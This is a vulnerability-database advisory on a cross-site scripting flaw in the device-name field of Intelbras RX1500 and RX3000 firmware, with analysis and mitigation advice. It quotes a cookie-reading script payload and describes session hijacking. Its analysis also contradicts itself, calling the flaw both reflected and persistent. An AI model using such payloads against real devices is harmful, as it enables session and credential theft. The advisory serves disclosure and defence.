CVE-2025-26064 in RX 1500info

Summary

by MITRE • 07/31/2025

A cross-site scripting (XSS) vulnerability in Intelbras RX1500 v2.2.9 and RX3000 v1.0.11 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the name of a connnected device.

VulDB is the best source for vulnerability data and more expert information about this specific topic.

Analysis

by VulDB Data Team • 08/04/2025

This cross-site scripting vulnerability exists within Intelbras RX1500 firmware version 2.2.9 and RX3000 firmware version 1.0.11 network security devices. The flaw resides in the insufficient input validation and output encoding mechanisms that fail to properly sanitize user-supplied data when processing device connection names. Attackers can exploit this weakness by injecting malicious scripts into the device name field during connection establishment, which then gets rendered in web interfaces without proper sanitization. This vulnerability falls under CWE-79 - Improper Neutralization of Input During Web Page Generation, specifically manifesting as a reflected XSS attack vector that can be triggered through web-based interfaces. The attack requires minimal privileges and can be executed by unauthenticated users who have access to the device management interface.

The technical implementation of this vulnerability stems from the device's failure to implement proper input validation controls for device name parameters. When a user connects a device to the network, the system accepts the device name without adequate sanitization of special characters that could be interpreted as HTML or script tags. The vulnerable code path processes this unsanitized input directly into web responses without appropriate HTML escaping or encoding mechanisms. This allows attackers to inject malicious payloads such as javascript:alert(document.cookie) or other script-based attacks that execute in the context of authenticated users' browsers. The vulnerability affects the web management interface where device connection information is displayed, creating a persistent vector for malicious code execution.

The operational impact of this vulnerability is significant as it enables attackers to perform session hijacking, steal user credentials, or redirect victims to malicious websites. An attacker could inject a script that steals authentication cookies, allowing unauthorized access to the device management interface. The vulnerability also enables the execution of arbitrary commands within the victim's browser context, potentially leading to complete compromise of the device management session. This issue is particularly concerning for network security devices where administrators may have elevated privileges, making the potential attack surface more critical. The vulnerability can be exploited remotely without requiring physical access to the devices, aligning with ATT&CK technique T1059.007 - Command and Scripting Interpreter: JavaScript and T1566.001 - Phishing: Spearphishing Attachment.

Mitigation strategies should include immediate firmware updates from Intelbras to address the XSS vulnerability, proper input validation and output encoding implementations, and web application firewalls that can detect and block malicious payloads. Organizations should implement network segmentation to limit access to management interfaces, enforce strong authentication mechanisms, and regularly audit device configurations. The implementation of Content Security Policy headers can provide additional protection against script execution, while regular security testing including dynamic application security testing and manual penetration testing should be conducted to identify similar vulnerabilities. This vulnerability highlights the importance of secure coding practices and proper input validation as outlined in OWASP Top 10 2021 and NIST SP 800-53 security controls.

Disclosure

07/31/2025

Moderation

accepted

CPE

ready

Exploit

Download

EPSS

0.00963

KEV

no

Activities

very low

Sources

Interested in the pricing of exploits?

See the underground prices here!